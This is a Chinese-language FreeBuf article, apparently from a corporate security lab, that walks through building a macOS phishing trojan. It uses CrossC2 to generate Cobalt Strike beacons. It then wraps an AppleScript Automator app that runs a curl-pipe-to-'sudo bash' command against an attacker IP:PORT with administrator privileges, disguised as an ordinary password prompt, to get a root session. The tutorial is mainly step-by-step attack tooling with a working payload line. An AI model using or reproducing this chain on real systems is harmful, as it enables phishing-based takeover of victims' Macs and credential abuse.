freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

MAC钓鱼并Root权限上线CS并权限维持,以及所有的坑如何解决
2022-12-02 18:22:06
所属地 浙江省

作者:文鸯@涂鸦智能安全实验室

制作MAC

一、下载工具

首先从github上下载CrossC2。链接:https://github.com/gloxec/CrossC2/releases/tag/v3.1.0。

image_375312672442931.png

根据你CS客户端的操作系统选择这里面的对应版本,以及CorssC2-githubBot-2022-06-07.cna这个CS插件。

二、CrossC2使用

首先用编辑器打开CorssC2-githubBot-2022-06-07.cna插件。

image_25135271108946666.png

将红色框出来的位置填上CrossC2
可执行文件的绝对路径(linux和mac版本要使用chmod +x 添加执行权限)。

然后去CS中添加插件即可。
image_2582368606859078.png
image_9362510890458193.png
image_3604339788604465.png

注意:这里的linster要用https的监听。

在生成木马时一定要注意需要将cs服务端中的.cobaltstrike.beacon_keys复制到客户端上,在红框处选中文件即可。
image_48365454909844185.png
这里的ProcessName是木马启动后在主机上的进程名,然后点机Build即可。在CS的log中会出现一个curl的命令,只需在被攻击机上执行便会上线。
image_9481471236623118.png

三、Root Mac app木马的制作

1、工具

image_8668581341414783.png

2、木马创建

打开automator.app,并且点击到运行Applescript。
image_7327605357628451.png

这是我们的木马程序,大致意思是执行我们的木马程序并且以root身份执行(此处的代码是从mac官方找到的模版)。

set unixDesktopPath to POSIX path of "/System/Library/User Template/"
set quotedUnixDesktopPath to quoted form of unixDesktopPath
set fromUnix to do shell script " curl \-A O \-o\- \-L http://IP:PORT/a \|sudo bash \-s " & quotedUnixDesktopPath with administrator privileges

end ru

制作好后点击保存即可
image_12314035538275325.png

3、运行

当点击这里的制作好的app程序会弹出输入密码的提示框(这里是做钓鱼时使用的木马,弹窗的名字都是以任意更改的)。
image_5111961320376777.png

当一输入密码就会上线到我们的CS上,此时CS上的用户是root。
image.png

权限维持

权限维持等下一期出,感谢大家的关注。

# web安全 # 系统安全 # 企业安全 # 网络安全技术
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录